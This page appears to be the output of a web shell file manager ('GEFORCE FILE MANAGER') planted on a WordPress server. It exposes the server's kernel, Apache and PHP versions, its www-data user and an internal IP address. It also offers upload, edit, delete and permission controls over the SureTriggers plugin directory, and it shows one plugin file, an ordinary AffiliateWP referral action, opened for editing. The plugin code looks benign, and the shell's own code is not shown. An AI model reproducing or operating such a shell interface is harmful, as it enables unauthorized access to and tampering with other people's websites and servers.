[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
suretriggers
/
src
/
Integrations
/
affiliatewp
/
actions
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 affiliate-create-affiliate.php
3,272 B
SET
[ EDIT ]
|
[ DEL ]
📄 affiliate-create-referral-user.php
3,577 B
SET
[ EDIT ]
|
[ DEL ]
📄 affiliate-create-referral.php
3,410 B
SET
[ EDIT ]
|
[ DEL ]
📄 affiliate-link-customer.php
4,930 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: affiliate-create-referral-user.php
<?php /** * AffiliateCreateReferralUser. * php version 5.6 * * @category AffiliateCreateReferralUser * @package SureTriggers * @author BSF <username@example.com> * @license https://www.gnu.org/licenses/gpl-3.0.html GPLv3 * @link https://www.brainstormforce.com/ * @since 1.0.0 */ use SureTriggers\Integrations\AutomateAction; use SureTriggers\Traits\SingletonLoader; /** * AffiliateCreateReferralUser * * @category AffiliateCreateReferralUser * @package SureTriggers * @author BSF <username@example.com> * @license https://www.gnu.org/licenses/gpl-3.0.html GPLv3 * @link https://www.brainstormforce.com/ * @since 1.0.0 */ class AffiliateCreateReferralUser extends AutomateAction { /** * Integration type. * * @var string */ public $integration = 'AffiliateWP'; /** * Action name. * * @var string */ public $action = 'affiliate_create_referral_user'; use SingletonLoader; /** * Register a action. * * @param array $actions actions. * @return array */ public function register( $actions ) { $actions[ $this->integration ][ $this->action ] = [ 'label' => __( 'Create Referral for User', 'suretriggers' ), 'action' => $this->action, 'function' => [ $this, 'action_listener' ], ]; return $actions; } /** * Action listener. * * @param int $user_id user_id. * @param int $automation_id automation_id. * @param array $fields fields. * @param array $selected_options selectedOptions. * @psalm-suppress UndefinedMethod * @throws Exception Exception. * * @return array|bool|void */ public function _action_listener( $user_id, $automation_id, $fields, $selected_options ) { $user_email = $selected_options['wp_user_email']; if ( is_email( $user_email ) ) { $user = get_user_by( 'email', $user_email ); if ( $user ) { if ( ! function_exists( 'affwp_add_referral' ) || ! function_exists( 'affwp_get_referral' ) || ! function_exists( 'affwp_get_affiliate_id' ) ) { return [ 'status' => 'error', 'message' => 'AffiliateWP function not found.', ]; } $affiliate_id = affwp_get_affiliate_id( $user->ID ); if ( $affiliate_id ) { $referral['amount'] = $selected_options['amount']; $referral['custom'] = $selected_options['custom']; $referral['status'] = $selected_options['status']; $referral['context'] = $selected_options['context']; $referral['reference'] = $selected_options['reference']; $referral['description'] = $selected_options['description']; $referral['type'] = $selected_options['type']; $referral['date'] = $selected_options['referral_date']; $referral['affiliate_id'] = $affiliate_id; $referral['user_id'] = $user->ID; $referral['user_name'] = $user->user_login; $referral_id = affwp_add_referral( $referral ); if ( $referral_id ) { $referral = affwp_get_referral( $referral_id ); $referral_data = get_object_vars( $referral ); return $referral_data; } else { return [ 'status' => 'error', 'message' => 'We are unable to add referral.', ]; } } else { return [ 'status' => 'error', 'message' => 'User is not an affiliate.', ]; } } else { return [ 'status' => 'error', 'message' => 'User not exists.', ]; } } else { return [ 'status' => 'error', 'message' => 'Please enter valid email address.', ]; } } } AffiliateCreateReferralUser::get_instance();